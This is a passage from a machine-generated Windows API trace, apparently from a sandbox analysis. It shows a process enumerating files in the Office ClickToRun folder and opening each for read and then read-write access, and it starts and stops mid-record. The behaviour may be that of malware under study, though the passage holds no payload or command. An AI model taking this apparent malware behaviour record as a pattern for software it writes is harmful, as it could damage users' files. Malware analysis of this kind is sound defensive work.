Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3f141b52, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x12ae)) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0081.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.822] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fa7ec8f, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x1162, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ServiceWatcherSchedule.xml", cAlternateFileName="SERVIC~1.XML")) returned 1 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0081.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0081.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0081.822] AreFileApisANSI () returned 1 [0081.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml", lpUsedDefaultChar=0x0) returned 85 [0081.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0081.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0081.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0081.823] AreFileApisANSI () returned 1 [0081.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0081.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81bf8 [0081.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x81bf8, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0081.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.823] GetFileType (hFile=0x430) returned 0x1 [0081.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0081.823] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0081.823] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0081.824] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0081.824] CloseHandle (hObject=0x430) returned 1 [0081.824] AreFileApisANSI () returned 1 [0081.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0081.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81bf8 [0081.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x81bf8, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0081.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.824] GetFileType (hFile=0x430) returned 0x1 [0081.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0081.824] CloseHandle (hObject=0x430) returned 1 [0081.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0081.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0081.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0081.826] AreFileApisANSI () returned 1 [0081.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81a88 [0081.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x81a88, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0081.826] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fa7ec8f, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x1162)) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0081.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.826] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbe3eab00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x101458, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="StreamServer.dll", cAlternateFileName="STREAM~1.DLL")) returned 1 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0081.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0081.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0081.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0081.827] AreFileApisANSI () returned 1 [0081.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll", lpUsedDefaultChar=0x0) returned 75 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0081.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0081.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0081.827] AreFileApisANSI () returned 1 [0081.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0081.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85580 [0081.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 75 [0081.828] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.828] GetFileType (hFile=0x430) returned 0x1 [0081.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0081.828] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0081.828] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0081.828] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0081.828] CloseHandle (hObject=0x430) returned 1 [0081.829] AreFileApisANSI () returned 1 [0081.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0081.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85bc0 [0081.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85bc0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 75 [0081.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.829] GetLastError () returned 0x20 [0081.829] GetLastError () returned 0x20 [0081.829] SetLastError (dwErrCode=0x20) [0081.829] GetLastError () returned 0x20 [0081.829] SetLastError (dwErrCode=0x20) [0081.829] GetLastError () returned 0x20 [0081.829] SetLastError (dwErrCode=0x20) [0081.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85bc0 | out: hHeap=0x20000) returned 1 [0081.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0081.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0081.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.829] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, 